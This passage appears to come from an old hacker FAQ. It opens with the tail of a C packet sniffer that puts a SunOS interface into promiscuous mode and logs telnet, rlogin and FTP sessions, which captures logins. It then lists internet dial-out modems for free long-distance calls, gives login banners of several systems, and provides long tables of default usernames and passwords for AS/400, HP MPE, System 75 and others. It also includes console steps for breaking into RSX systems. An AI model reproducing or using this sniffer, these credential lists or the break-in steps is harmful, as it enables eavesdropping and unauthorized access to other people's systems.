  945.      register struct CREC *CLe,*CLt = CLroot; \
  946.      LastTIME=(tm+IDLE_TIMEOUT); tm-=IDLE_TIMEOUT; \
  947.      while(CLe=CLt) { \
  948.        CLt=CLe->Next; \
  949.        if(CLe->Time <tm) \
  950.        END_NODE(CLe,(u_char *)NULL,0,"IDLE TIMEOUT"); \
  951.      } \
  952.   } \
  953. }
  954.  
  955. void filter(cp, pktlen)
  956. register char *cp;
  957. register u_int pktlen;
  958. {
  959.  register struct ip     *ip;
  960.  register struct tcphdr *tcph;
  961.  
  962.  { register u_short EtherType=ntohs(((struct ether_header *)cp)->ether_type);
  963.  
  964.    if(EtherType < 0x600) {
  965.      EtherType = *(u_short *)(cp + SZETH + 6);
  966.      cp+=8; pktlen-=8;
  967.    }
  968.  
  969.    if(EtherType != ETHERTYPE_IP) /* chuk it if its not IP */
  970.       return;
  971.  }
  972.  
  973.     /* ugh, gotta do an alignment :-( */
  974.  bcopy(cp + SZETH, (char *)Packet,(int)(pktlen - SZETH));
  975.  
  976.  ip = (struct ip *)Packet;
  977.  if( ip->ip_p != IPPROTO_TCP) /* chuk non tcp pkts */
  978.     return;
  979.  tcph = (struct tcphdr *)(Packet + IPHLEN);
  980.  
  981.  if(!( (TCPD == IPPORT_TELNET) ||
  982.        (TCPD == IPPORT_LOGINSERVER) ||
  983.        (TCPD == IPPORT_FTP)
  984.    )) return;
  985.  
  986.  { register struct CREC *CLm;
  987.    register int length = ((IPLEN - (IPHLEN * 4)) - (TCPOFF * 4));
  988.    register u_char *p = (u_char *)Packet;
  989.  
  990.    p += ((IPHLEN * 4) + (TCPOFF * 4));
  991.  
  992.  if(debug) {
  993.   fprintf(LOG,"PKT: (%s %04X) ", TCPflags(tcph->th_flags),length);
  994.   fprintf(LOG,"%s[%s] => ", inet_ntoa(IPS),SERVp(TCPS));
  995.   fprintf(LOG,"%s[%s]\n", inet_ntoa(IPD),SERVp(TCPD));
  996.  }
  997.  
  998.    if( CLm = GET_NODE(IPS, TCPS, IPD, TCPD) ) {
  999.  
  1000.       CLm->PKcnt++;
  1001.  
  1002.       if(length>0)
  1003.     if( (CLm->Length + length) < MAXBUFLEN ) {
  1004.       ADDDATA_NODE( CLm, p,length);
  1005.     } else {
  1006.       END_NODE( CLm, p,length, "DATA LIMIT");
  1007.     }
  1008.  
  1009.       if(TCPFL(TH_FIN|TH_RST)) {
  1010.       END_NODE( CLm, (u_char *)NULL,0,TCPFL(TH_FIN)?"TH_FIN":"TH_RST" );
  1011.       }
  1012.  
  1013.    } else {
  1014.  
  1015.       if(TCPFL(TH_SYN)) {
  1016.      ADD_NODE(IPS,IPD,TCPS,TCPD,p,length);
  1017.       }
  1018.  
  1019.    }
  1020.  
  1021.    IDLE_NODE();
  1022.  
  1023.  }
  1024.  
  1025. }
  1026.  
  1027. /* signal handler
  1028.  */
  1029. void death()
  1030. { register struct CREC *CLe;
  1031.  
  1032.     while(CLe=CLroot)
  1033.     END_NODE( CLe, (u_char *)NULL,0, "SIGNAL");
  1034.  
  1035.     fprintf(LOG,"\nLog ended at => %s\n",NOWtm());
  1036.     fflush(LOG);
  1037.     if(LOG != stdout)
  1038.     fclose(LOG);
  1039.     exit(1);
  1040. }
  1041.  
  1042. /* opens network interface, performs ioctls and reads from it,
  1043.  * passing data to filter function
  1044.  */
  1045. void do_it()
  1046. {
  1047.     int cc;
  1048.     char *buf;
  1049.     u_short sp_ts_len;
  1050.  
  1051.     if(!(buf=malloc(CHUNKSIZE)))
  1052.     Pexit(1,"Eth: malloc");
  1053.  
  1054. /* this /dev/nit initialization code pinched from etherfind */
  1055.   {
  1056.     struct strioctl si;
  1057.     struct ifreq    ifr;
  1058.     struct timeval  timeout;
  1059.     u_int  chunksize = CHUNKSIZE;
  1060.     u_long if_flags  = NI_PROMISC;
  1061.  
  1062.     if((if_fd = open(NIT_DEV, O_RDONLY)) < 0)
  1063.     Pexit(1,"Eth: nit open");
  1064.  
  1065.     if(ioctl(if_fd, I_SRDOPT, (char *)RMSGD) < 0)
  1066.     Pexit(1,"Eth: ioctl (I_SRDOPT)");
  1067.  
  1068.     si.ic_timout = INFTIM;
  1069.  
  1070.     if(ioctl(if_fd, I_PUSH, "nbuf") < 0)
  1071.     Pexit(1,"Eth: ioctl (I_PUSH \"nbuf\")");
  1072.  
  1073.     timeout.tv_sec = 1;
  1074.     timeout.tv_usec = 0;
  1075.     si.ic_cmd = NIOCSTIME;
  1076.     si.ic_len = sizeof(timeout);
  1077.     si.ic_dp  = (char *)&timeout;
  1078.     if(ioctl(if_fd, I_STR, (char *)&si) < 0)
  1079.     Pexit(1,"Eth: ioctl (I_STR: NIOCSTIME)");
  1080.  
  1081.     si.ic_cmd = NIOCSCHUNK;
  1082.     si.ic_len = sizeof(chunksize);
  1083.     si.ic_dp  = (char *)&chunksize;
  1084.     if(ioctl(if_fd, I_STR, (char *)&si) < 0)
  1085.     Pexit(1,"Eth: ioctl (I_STR: NIOCSCHUNK)");
  1086.  
  1087.     strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name));
  1088.     ifr.ifr_name[sizeof(ifr.ifr_name) - 1] = '\0';
  1089.     si.ic_cmd = NIOCBIND;
  1090.     si.ic_len = sizeof(ifr);
  1091.     si.ic_dp  = (char *)𝔦
  1092.     if(ioctl(if_fd, I_STR, (char *)&si) < 0)
  1093.     Pexit(1,"Eth: ioctl (I_STR: NIOCBIND)");
  1094.  
  1095.     si.ic_cmd = NIOCSFLAGS;
  1096.     si.ic_len = sizeof(if_flags);
  1097.     si.ic_dp  = (char *)&if_flags;
  1098.     if(ioctl(if_fd, I_STR, (char *)&si) < 0)
  1099.     Pexit(1,"Eth: ioctl (I_STR: NIOCSFLAGS)");
  1100.  
  1101.     if(ioctl(if_fd, I_FLUSH, (char *)FLUSHR) < 0)
  1102.     Pexit(1,"Eth: ioctl (I_FLUSH)");
  1103.   }
  1104.  
  1105.     while ((cc = read(if_fd, buf, CHUNKSIZE)) >= 0) {
  1106.     register char *bp = buf,
  1107.               *bufstop = (buf + cc);
  1108.  
  1109.     while (bp < bufstop) {
  1110.         register char *cp = bp;
  1111.         register struct nit_bufhdr *hdrp;
  1112.  
  1113.         hdrp = (struct nit_bufhdr *)cp;
  1114.         cp += sizeof(struct nit_bufhdr);
  1115.         bp += hdrp->nhb_totlen;
  1116.         filter(cp, (u_long)hdrp->nhb_msglen);
  1117.     }
  1118.     }
  1119.     Pexit((-1),"Eth: read");
  1120. }
  1121.  /* Authorize your proogie,generate your own password and uncomment here */
  1122. /* #define AUTHPASSWD "EloiZgZejWyms" */
  1123.  
  1124. void getauth()
  1125. { char *buf,*getpass(),*crypt();
  1126.   char pwd[21],prmpt[81];
  1127.  
  1128.     strcpy(pwd,AUTHPASSWD);
  1129.     sprintf(prmpt,"(%s)UP? ",ProgName);
  1130.     buf=getpass(prmpt);
  1131.     if(strcmp(pwd,crypt(buf,pwd)))
  1132.     exit(1);
  1133. }
  1134.     */
  1135. void main(argc, argv)
  1136. int argc;
  1137. char **argv;
  1138. {
  1139.     char   cbuf[BUFSIZ];
  1140.     struct ifconf ifc;
  1141.     int    s,
  1142.        ac=1,
  1143.        backg=0;
  1144.  
  1145.     ProgName=argv[0];
  1146.  
  1147.  /*     getauth(); */
  1148.  
  1149.     LOG=NULL;
  1150.     device=NULL;
  1151.     while((ac<argc) && (argv[ac][0] == '-')) {
  1152.        register char ch = argv[ac++][1];
  1153.        switch(toupper(ch)) {
  1154.         case 'I': device=argv[ac++];
  1155.               break;
  1156.         case 'F': if(!(LOG=fopen((LogName=argv[ac++]),"a")))
  1157.              Zexit(1,"Output file cant be opened\n");
  1158.               break;
  1159.         case 'B': backg=1;
  1160.               break;
  1161.         case 'D': debug=1;
  1162.               break;
  1163.         default : fprintf(ERR,
  1164.             "Usage: %s [-b] [-d] [-i interface] [-f file]\n",
  1165.                 ProgName);
  1166.               exit(1);
  1167.        }
  1168.     }
  1169.  
  1170.     if(!device) {
  1171.     if((s=socket(AF_INET, SOCK_DGRAM, 0)) < 0)
  1172.         Pexit(1,"Eth: socket");
  1173.  
  1174.     ifc.ifc_len = sizeof(cbuf);
  1175.     ifc.ifc_buf = cbuf;
  1176.     if(ioctl(s, SIOCGIFCONF, (char *)&ifc) < 0)
  1177.         Pexit(1,"Eth: ioctl");
  1178.  
  1179.     close(s);
  1180.     device = ifc.ifc_req->ifr_name;
  1181.     }
  1182.  
  1183.     fprintf(ERR,"Using logical device %s [%s]\n",device,NIT_DEV);
  1184.     fprintf(ERR,"Output to %s.%s%s",(LOG)?LogName:"stdout",
  1185.         (debug)?" (debug)":"",(backg)?" Backgrounding ":"\n");
  1186.  
  1187.     if(!LOG)
  1188.     LOG=stdout;
  1189.  
  1190.     signal(SIGINT, death);
  1191.     signal(SIGTERM,death);
  1192.     signal(SIGKILL,death);
  1193.     signal(SIGQUIT,death);
  1194.  
  1195.     if(backg && debug) {
  1196.      fprintf(ERR,"[Cannot bg with debug on]\n");
  1197.      backg=0;
  1198.     }
  1199.  
  1200.     if(backg) {
  1201.     register int s;
  1202.  
  1203.     if((s=fork())>0) {
  1204.        fprintf(ERR,"[pid %d]\n",s);
  1205.        exit(0);
  1206.     } else if(s<0)
  1207.        Pexit(1,"fork");
  1208.  
  1209.     if( (s=open("/dev/tty",O_RDWR))>0 ) {
  1210.         ioctl(s,TIOCNOTTY,(char *)NULL);
  1211.         close(s);
  1212.     }
  1213.     }
  1214.     fprintf(LOG,"\nLog started at => %s [pid %d]\n",NOWtm(),getpid());
  1215.     fflush(LOG);
  1216.  
  1217.     do_it();
  1218. }
  1219.  
  1220.  
  1221. 18. What is an Internet Outdial?
  1222.  
  1223. An Internet outdial is a modem connected to the Internet than you can
  1224. use to dial out.  Normal outdials will only call local numbers.  A GOD
  1225. (Global OutDial) is capable of calling long distance.  Outdials are an
  1226. inexpensive method of calling long distance BBS's.
  1227.  
  1228.  
  1229. 19. What are some Internet Outdials?
  1230.  
  1231.  
  1232. Area    Address(s)                      Command(s)
  1233. ------  ------------------------------- ---------------------
  1234. 201     128.112.88.0
  1235.     128.112.88.1
  1236.     128.112.88.2
  1237.     128.112.88.3
  1238. 204     umnet.cc.manitoba.ca            "dial12" or "dial24"
  1239. 206     dialout24.cac.washington.edu
  1240. 215     wiseowl.ocis.temple.edu         atz
  1241.                     atdt 9xxxyyyy
  1242.     129.72.1.59                     hayes compat
  1243. 218     aa28.d.umn.edu                  cli
  1244.                     rlogin modem
  1245.                     at "login:" type 
  1246.                     "modem"
  1247.     modem.d.umn.edu                 "Hayes"
  1248. 232     isn.rdns.iastate.edu            MODEM              [Works!!]
  1249.                     atz 
  1250.                     atdt8xxx-xxxx
  1251. 303     129.82.100.64                   login: modem       [need password!]
  1252. 307     modem.uwyo.edu
  1253.     129.72.1.59                     hayes compat
  1254. 313     35.1.1.6                        "dial2400-aa" or   [can't connect]
  1255.                     "dial1200-aa"
  1256. 315     198.36.22.3                     "modem"
  1257. 404     emory.edu                       .modem8 or
  1258.                     .dialout
  1259.     broadband.cc.emory.edu          .modem8 or
  1260.                     .dialout
  1261.     128.140.1.239                   .modem8|CR
  1262.                     or .modem96|CR
  1263. 412     gate.cis.pitt.edu               LAT
  1264.                     connect dialout
  1265.                     ^E
  1266.                     atdt 91k xxx-xxxx
  1267. 415     128.32.132.250                  "dial1" or "dial2"
  1268. 416     pacx.utcs.utoronto.ca           modem
  1269.                     atdt 9xxx-xxxx
  1270. 502     uknet.uky.edu                   outdial2400
  1271.                     atdt 9xxx-xxxx
  1272. 510     annex132-1.eecs.berkeley.edu    atdt 9,,,,, xxx-xxxx
  1273. 514     132.204.2.11                    externe#9 9xxx-xxxx
  1274. 515     isn.rdns.iastate.edu            login MODEM 
  1275.                     dial atdt8xxx-yyyy
  1276. 602     129.219.17.3                    atdt8,,,,,xyyyxxxyyyy
  1277.     129.219.17.3                    login: MODEM
  1278.                     atdt 8xxx-xxxx
  1279. 609     129.72.1.59                     "Hayes"
  1280.     128.119.131.110                 "Hayes"
  1281.     128.119.131.111         
  1282.     128.119.131.112
  1283.     128.119.131.113
  1284.     128.119.131.114
  1285.     128.112.131.110
  1286.     128.112.131.111
  1287.     128.112.131.112
  1288.     128.112.131.113
  1289.     128.112.131.114                 the above are hayes
  1290. 614     ns2400.ircc.ohio-state.edu      DIAL               [can't connect]
  1291. 615     dca.utk.edu                     "dial2400"
  1292. 617     dialout.lcs.mit.edu
  1293. 619     dialin.ucsd.edu                 "dialout"
  1294.     128.54.30.1                     nue
  1295. 713     128.143.70.101                  "connect hayes"
  1296.     128.249.27.154                  c modem96
  1297.                     atdt 9xxx-xxxx
  1298.     128.249.27.153                  " -+ as above +- "
  1299.     modem24.bcm.tmc.edu
  1300.     modem12.bcm.tmc.edu
  1301. 714     130.191.4.70                    atdt 8xxx-xxxx
  1302. 804     ublan.acc.virginia.edu          c hayes
  1303.     128.143.70.101                  connect hayes
  1304.                     atdt xxx-xxxx
  1305. 902     star.ccs.tuns.ca                "dialout"          [down...]
  1306. 916     128.120.2.251                   "dialout"          [down...]
  1307.     129.137.33.72                                      [can't connect]
  1308. ???     dialout1.princeton.edu                             [can't connect]
  1309.     dswitch.byu.edu                 "C Modem"          [can't connect]
  1310.     modem.cis.uflu.edu                                 [can't connect]
  1311.     r596adi1.uc.edu                                    [can't connect]
  1312.     vtnet1.cns.ut.edu               "CALL" or "call"   [can't connect]
  1313.     18.26.0.55                                         [can't connect]
  1314.     128.173.5.4                                        [need password!]
  1315.     128.187.1.2                                        [need password!]
  1316.     129.137.33.71                                      [can't connect]
  1317.     bstorm.bga.com / port=4000                         [what is this?]
  1318.  
  1319.  
  1320. 20. What is this system?
  1321.  
  1322. AS/400
  1323. ~~~~~~
  1324. UserID?
  1325. Password?
  1326.  
  1327. Once in, type GO MAIN
  1328.  
  1329.  
  1330. CDC Cyber
  1331. ~~~~~~~~~
  1332. WELCOME TO THE NOS SOFTWARE SYSTEM.
  1333. COPYRIGHT CONTROL DATA 1978, 1987.
  1334.  
  1335. 88/02/16. 02.36.53. N265100
  1336. CSUS CYBER 170-730.                     NOS 2.5.2-678/3.
  1337. FAMILY:
  1338.  
  1339. You would normally just hit return at the family prompt.  Next prompt is:
  1340.  
  1341. USER NAME:
  1342.  
  1343.  
  1344. Hewlett Packard MPE-XL
  1345. ~~~~~~~~~~~~~~~~~~~~~~
  1346. MPE XL:
  1347. EXPECTED A :HELLO COMMAND. (CIERR 6057)
  1348. MPE XL:
  1349. EXPECTED [SESSION NAME,] USER.ACCT [,GROUP]   (CIERR 1424)
  1350. MPE XL:
  1351.  
  1352.  
  1353. GTN
  1354. ~~~
  1355. WELCOME TO CITIBANK. PLEASE SIGN ON.
  1356. XXXXXXXX
  1357.  
  1358. @
  1359. PASSWORD =
  1360.  
  1361. @
  1362.  
  1363. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  1364.  
  1365. PLEASE ENTER YOUR ID:-1->
  1366. PLEASE ENTER YOUR PASSWORD:-2->
  1367.  
  1368. CITICORP (CITY NAME). KEY GHELP FOR HELP.
  1369.   XXX.XXX
  1370.  PLEASE SELECT SERVICE REQUIRED.-3->
  1371.  
  1372.  
  1373. PRIMOS
  1374. ~~~~~~
  1375. PRIMENET 19.2.7F PPOA1
  1376.  
  1377. <any text>
  1378.  
  1379. ER!
  1380.  
  1381. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  1382.  
  1383. CONNECT
  1384. Primenet V 2.3  (system)
  1385. LOGIN           (you)
  1386. User id?        (system)
  1387. SAPB5           (you)
  1388. Password?       (system)
  1389. DROWSAP         (you)
  1390. OK,             (system)
  1391.  
  1392.  
  1393. ROLM-OSL
  1394. ~~~~~~~~
  1395. MARAUDER10292  01/09/85(^G) 1 03/10/87  00:29:47
  1396. RELEASE 8003
  1397. OSL, PLEASE.
  1398. ?
  1399.  
  1400.  
  1401. Tops-10
  1402. ~~~~~~~
  1403. NIH Timesharing
  1404.  
  1405. NIH Tri-SMP 7.02-FF  16:30:04 TTY11
  1406. system 1378/1381/1453 Connected to Node Happy(40) Line # 12
  1407. Please LOGIN
  1408. .
  1409.  
  1410.  
  1411. VM/370
  1412. ~~~~~~
  1413. VM/370
  1414. !
  1415.  
  1416.  
  1417. 21. What are the default accounts for XXX?
  1418.  
  1419. AIX
  1420. ~~~
  1421. guest           guest
  1422.  
  1423.  
  1424. AS/400
  1425. ~~~~~~
  1426. qsecofr         qsecofr         /* master security officer */
  1427. qsysopr         qsysopr         /* system operator         */
  1428. qpgmr           qpgmr           /* default programmer      */
  1429.  
  1430. also
  1431.  
  1432. secofr/secofr (sometimes...)
  1433. ibm/password
  1434. ibm/2222
  1435. ibm/service
  1436.  
  1437.  
  1438. Hewlett Packard MPE-XL
  1439. ~~~~~~~~~~~~~~~~~~~~~~
  1440. Format is Account.Group,Job
  1441.  
  1442. HELLO           Account           Password
  1443. ~~~~~           ~~~~~~~~~~~~~     ~~~~~~~~~~~
  1444. HELLO           MANAGER.SYS
  1445. HELLO           MGR.SYS
  1446. HELLO           FIELD.SUPPORT     HPUNSUP or SUPPORT or HP
  1447. HELLO           OP.OPERATOR
  1448. MGR             CAROLIAN
  1449. MGR             CCC
  1450. MGR             CNAS
  1451. MGR             CONV
  1452. MGR             COGNOS
  1453. OPERATOR        COGNOS
  1454. MANAGER         COGNOS
  1455. OPERATOR        DISC
  1456. MGR             HPDESK
  1457. MGR             HPWORD
  1458. FIELD           HPWORD
  1459. MGR             HPOFFICE
  1460. SPOOLMAN        HPOFFICE
  1461. ADVMAIL         HPOFFICE
  1462. MAIL            HPOFFICE
  1463. WP              HPOFFICE
  1464. MANAGER         HPOFFICE
  1465. MGR             HPONLY
  1466. FIELD           HPP187
  1467. MGR             HPP187
  1468. MGR             HPP189
  1469. MGR             HPP196
  1470. MGR             INTX3
  1471. MGR             ITF3000
  1472. MANAGER         ITF3000
  1473. MAIL            MAIL
  1474. MGR             NETBASE
  1475. MGR             REGO
  1476. MGR             RJE
  1477. MGR             ROBELLE
  1478. MANAGER         SECURITY
  1479. MGR             SECURITY
  1480. FIELD           SERVICE
  1481. MANAGER         SYS
  1482. MGR             SYS
  1483. PCUSER          SYS
  1484. RSBCMON         SYS
  1485. OPERATOR        SYS
  1486. OPERATOR        SYSTEM
  1487. FIELD           SUPPORT
  1488. OPERATOR        SUPPORT
  1489. MANAGER         TCH
  1490. MAIL            TELESUP
  1491. MANAGER         TELESUP
  1492. MGR             TELESUP
  1493. SYS             TELESUP
  1494. MGE             VESOFT
  1495. MGE             VESOFT
  1496. MGR             WORD
  1497. MGR             XLSERVER
  1498.  
  1499. Common jobs are Pub, Sys, Data
  1500. Common passwords are HPOnly, TeleSup, HP, MPE, Manager, MGR, Remote
  1501.  
  1502.  
  1503. PICK O/S
  1504. ~~~~~~~~
  1505. DSA             # Desquetop System Administrator
  1506. DS
  1507. DESQUETOP
  1508. PHANTOM
  1509.  
  1510.  
  1511. Rolm
  1512. ~~~~
  1513. CBX Defaults
  1514.  
  1515. op              op
  1516. op              operator
  1517. su              super
  1518. admin           pwp
  1519. eng             engineer
  1520.  
  1521.  
  1522. PhoneMail Defaults
  1523.  
  1524. sysadmin        sysadmin
  1525. tech            tech
  1526. poll            tech
  1527.  
  1528.  
  1529. RSX
  1530. ~~~
  1531. SYSTEM/SYSTEM   (Username SYSTEM, Password SYSTEM)
  1532. 1,1/system      (Directory [1,1] Password SYSTEM)
  1533. BATCH/BATCH
  1534. SYSTEM/MANAGER
  1535. USER/USER
  1536.  
  1537. Default accounts for Micro/RSX:
  1538.  
  1539.         MICRO/RSX
  1540.  
  1541. Alternately you can hit <CTRL-Z>  when the boot sequence asks you for the
  1542. date and create an account using:
  1543.  
  1544.         RUN ACNT
  1545.         or  RUN $ACNT
  1546.  
  1547. (Numbers below 10 {oct} are Priveleged)
  1548.  
  1549. Reboot and wait for the date/time question. Type ^C and at the MCR prompt,
  1550. type "abo at." You must include the . dot!
  1551.  
  1552. If this works, type "acs lb0:/blks=1000" to get some swap space so the
  1553. new step won't wedge.
  1554.  
  1555. type " run $acnt" and change the password of any account with a group
  1556. number of 7 or less.
  1557.  
  1558. You may find that the ^C does not work. Try ^Z and ESC as well.
  1559. Also try all 3 as terminators to valid and invalid times.
  1560.  
  1561. If none of the above work, use the halt switch to halt the system,
  1562. just after a invalid date-time.  Look for a user mode PSW 1[4-7]xxxx.
  1563. then deposit 177777 into R6, cross your fingers, write protect the drive
  1564. and continue the system.  This will hopefully result in indirect blowing
  1565. up...  And hopefully the system has not been fully secured.
  1566.  
  1567.  
  1568. System 75
  1569. ~~~~~~~~~
  1570. Username        Passwords
  1571. ~~~~~~~~        ~~~~~~~~~
  1572. bcim            bcimpw
  1573. bciim           bciimpw
  1574. bcms            bcmspw, bcms
  1575. bcnas           bcnspw
  1576. blue            bluepw
  1577. browse          looker, browsepw
  1578. craft           crftpw, craftpw, crack
  1579. cust            custpw
  1580. enquiry         enquirypw
  1581. field           support
  1582. inads           indspw, inadspw, inads
  1583. init            initpw
  1584. kraft           kraftpw
  1585. locate          locatepw
  1586. maint           maintpw, rwmaint
  1587. nms             nmspw
  1588. rcust           rcustpw
  1589. support         supportpw
  1590. tech            field
  1591.  
  1592.           
  1593. Verifone Junior 2.05
  1594. ~~~~~~~~~~~~~~~~~~~~
  1595. Default password: 166816
  1596.  
  1597.  
  1598. VMS
  1599. ~~~
  1600. field           service
  1601. systest         utep
  1602.  
  1603.  
  1604. 22. What port is XXX on?
  1605.  
  1606. The file /etc/services on most Unix machines lists the activity
  1607. occurring on each port.  Here is the most complete port list in
  1608. existence, originally presented in RFC 1340:
  1609.  
  1610. Keyword         Decimal    Description
  1611. -------         -------    -----------
  1612.           0/tcp    Reserved
  1613.           0/udp    Reserved
  1614. tcpmux            1/tcp    TCP Port Service Multiplexer
  1615. tcpmux            1/udp    TCP Port Service Multiplexer
  1616. compressnet       2/tcp    Management Utility
  1617. compressnet       2/udp    Management Utility
  1618. compressnet       3/tcp    Compression Process
  1619. compressnet       3/udp    Compression Process
  1620.           4/tcp    Unassigned
  1621.           4/udp    Unassigned
  1622. rje               5/tcp    Remote Job Entry
  1623. rje               5/udp    Remote Job Entry
  1624.           6/tcp    Unassigned
  1625.           6/udp    Unassigned
  1626. echo              7/tcp    Echo
  1627. echo              7/udp    Echo
  1628.           8/tcp    Unassigned
  1629.           8/udp    Unassigned
  1630. discard           9/tcp    Discard
  1631. discard           9/udp    Discard
  1632.          10/tcp    Unassigned
  1633.          10/udp    Unassigned
  1634. systat           11/tcp    Active Users
  1635. systat           11/udp    Active Users
  1636.          12/tcp    Unassigned
  1637.          12/udp    Unassigned
  1638. daytime          13/tcp    Daytime
  1639. daytime          13/udp    Daytime
  1640.          14/tcp    Unassigned
  1641.          14/udp    Unassigned
  1642.          15/tcp    Unassigned [was netstat]
  1643.          15/udp    Unassigned
  1644.          16/tcp    Unassigned
  1645.          16/udp    Unassigned
  1646. qotd             17/tcp    Quote of the Day
  1647. qotd             17/udp    Quote of the Day
  1648. msp              18/tcp    Message Send Protocol
  1649. msp              18/udp    Message Send Protocol
  1650. chargen          19/tcp    Character Generator
  1651. chargen          19/udp    Character Generator
  1652. ftp-data         20/tcp    File Transfer [Default Data]
  1653. ftp-data         20/udp    File Transfer [Default Data]
  1654. ftp              21/tcp    File Transfer [Control]
  1655. ftp              21/udp    File Transfer [Control]
  1656.          22/tcp    Unassigned
  1657.          22/udp    Unassigned
  1658. telnet           23/tcp    Telnet
  1659. telnet           23/udp    Telnet
  1660.          24/tcp    any private mail system
  1661.          24/udp    any private mail system
  1662. smtp             25/tcp    Simple Mail Transfer
  1663. smtp             25/udp    Simple Mail Transfer
  1664.          26/tcp    Unassigned
  1665.          26/udp    Unassigned
  1666. nsw-fe           27/tcp    NSW User System FE
  1667. nsw-fe           27/udp    NSW User System FE
  1668.          28/tcp    Unassigned
  1669.          28/udp    Unassigned
  1670. msg-icp          29/tcp    MSG ICP
  1671. msg-icp          29/udp    MSG ICP
  1672.          30/tcp    Unassigned
  1673.          30/udp    Unassigned
  1674. msg-auth         31/tcp    MSG Authentication
  1675. msg-auth         31/udp    MSG Authentication
  1676.          32/tcp    Unassigned
  1677.          32/udp    Unassigned
  1678. dsp              33/tcp    Display Support Protocol
  1679. dsp              33/udp    Display Support Protocol
  1680.          34/tcp    Unassigned
  1681.          34/udp    Unassigned
  1682.          35/tcp    any private printer server
  1683.          35/udp    any private printer server
  1684.          36/tcp    Unassigned
  1685.          36/udp    Unassigned
  1686. time             37/tcp    Time
  1687. time             37/udp    Time
  1688.          38/tcp    Unassigned
  1689.          38/udp    Unassigned
  1690. rlp              39/tcp    Resource Location Protocol
  1691. rlp              39/udp    Resource Location Protocol
  1692.          40/tcp    Unassigned
  1693.          40/udp    Unassigned
  1694. graphics         41/tcp    Graphics
  1695. graphics         41/udp    Graphics
  1696. nameserver       42/tcp    Host Name Server
  1697. nameserver       42/udp    Host Name Server
  1698. nicname          43/tcp    Who Is
  1699. nicname          43/udp    Who Is
  1700. mpm-flags        44/tcp    MPM FLAGS Protocol
  1701. mpm-flags        44/udp    MPM FLAGS Protocol
  1702. mpm              45/tcp    Message Processing Module [recv]
  1703. mpm              45/udp    Message Processing Module [recv]
  1704. mpm-snd          46/tcp    MPM [default send]
  1705. mpm-snd          46/udp    MPM [default send]
  1706. ni-ftp           47/tcp    NI FTP
  1707. ni-ftp           47/udp    NI FTP
  1708.          48/tcp    Unassigned
  1709.          48/udp    Unassigned
  1710. login            49/tcp    Login Host Protocol
  1711. login            49/udp    Login Host Protocol
  1712. re-mail-ck       50/tcp    Remote Mail Checking Protocol
  1713. re-mail-ck       50/udp    Remote Mail Checking Protocol
  1714. la-maint         51/tcp    IMP Logical Address Maintenance
  1715. la-maint         51/udp    IMP Logical Address Maintenance
  1716. xns-time         52/tcp    XNS Time Protocol
  1717. xns-time         52/udp    XNS Time Protocol
  1718. domain           53/tcp    Domain Name Server
  1719. domain           53/udp    Domain Name Server
  1720. xns-ch           54/tcp    XNS Clearinghouse
  1721. xns-ch           54/udp    XNS Clearinghouse
  1722. isi-gl           55/tcp    ISI Graphics Language
  1723. isi-gl           55/udp    ISI Graphics Language
  1724. xns-auth         56/tcp    XNS Authentication
  1725. xns-auth         56/udp    XNS Authentication
  1726.          57/tcp    any private terminal access
  1727.          57/udp    any private terminal access
  1728. xns-mail         58/tcp    XNS Mail
  1729. xns-mail         58/udp    XNS Mail
  1730.          59/tcp    any private file service
  1731.          59/udp    any private file service
  1732.          60/tcp    Unassigned
  1733.          60/udp    Unassigned
  1734. ni-mail          61/tcp    NI MAIL
  1735. ni-mail          61/udp    NI MAIL
  1736. acas             62/tcp    ACA Services
  1737. acas             62/udp    ACA Services
  1738. via-ftp          63/tcp    VIA Systems - FTP
  1739. via-ftp          63/udp    VIA Systems - FTP
  1740. covia            64/tcp    Communications Integrator (CI)
  1741. covia            64/udp    Communications Integrator (CI)
  1742. tacacs-ds        65/tcp    TACACS-Database Service
  1743. tacacs-ds        65/udp    TACACS-Database Service
  1744. sql*net          66/tcp    Oracle SQL*NET
  1745. sql*net          66/udp    Oracle SQL*NET
  1746. bootps           67/tcp    Bootstrap Protocol Server
  1747. bootps           67/udp    Bootstrap Protocol Server
  1748. bootpc           68/tcp    Bootstrap Protocol Client
  1749. bootpc           68/udp    Bootstrap Protocol Client
  1750. tftp             69/tcp    Trivial File Transfer
  1751. tftp             69/udp    Trivial File Transfer
  1752. gopher           70/tcp    Gopher
  1753. gopher           70/udp    Gopher
  1754. netrjs-1         71/tcp    Remote Job Service
  1755. netrjs-1         71/udp    Remote Job Service
  1756. netrjs-2         72/tcp    Remote Job Service
  1757. netrjs-2         72/udp    Remote Job Service
  1758. netrjs-3         73/tcp    Remote Job Service
  1759. netrjs-3         73/udp    Remote Job Service
  1760. netrjs-4         74/tcp    Remote Job Service
  1761. netrjs-4         74/udp    Remote Job Service
  1762.          75/tcp    any private dial out service
  1763.          75/udp    any private dial out service
  1764.          76/tcp    Unassigned
  1765.          76/udp    Unassigned
  1766.          77/tcp    any private RJE service
  1767.          77/udp    any private RJE service
  1768. vettcp           78/tcp    vettcp
  1769. vettcp           78/udp    vettcp
  1770. finger           79/tcp    Finger
  1771. finger           79/udp    Finger
  1772. www              80/tcp    World Wide Web HTTP
  1773. www              80/udp    World Wide Web HTTP
  1774. hosts2-ns        81/tcp    HOSTS2 Name Server
  1775. hosts2-ns        81/udp    HOSTS2 Name Server
  1776. xfer             82/tcp    XFER Utility
  1777. xfer             82/udp    XFER Utility
  1778. mit-ml-dev       83/tcp    MIT ML Device
  1779. mit-ml-dev       83/udp    MIT ML Device
  1780. ctf              84/tcp    Common Trace Facility
  1781. ctf              84/udp    Common Trace Facility
  1782. mit-ml-dev       85/tcp    MIT ML Device
  1783. mit-ml-dev       85/udp    MIT ML Device
  1784. mfcobol          86/tcp    Micro Focus Cobol
  1785. mfcobol          86/udp    Micro Focus Cobol
  1786.          87/tcp    any private terminal link
  1787.          87/udp    any private terminal link
  1788. kerberos         88/tcp    Kerberos
  1789. kerberos         88/udp    Kerberos
  1790. su-mit-tg        89/tcp    SU/MIT Telnet Gateway
  1791. su-mit-tg        89/udp    SU/MIT Telnet Gateway
  1792. dnsix            90/tcp    DNSIX Securit Attribute Token Map
  1793. dnsix            90/udp    DNSIX Securit Attribute Token Map
  1794. mit-dov          91/tcp    MIT Dover Spooler
  1795. mit-dov          91/udp    MIT Dover Spooler
  1796. npp              92/tcp    Network Printing Protocol
  1797. npp              92/udp    Network Printing Protocol
  1798. dcp              93/tcp    Device Control Protocol
  1799. dcp              93/udp    Device Control Protocol
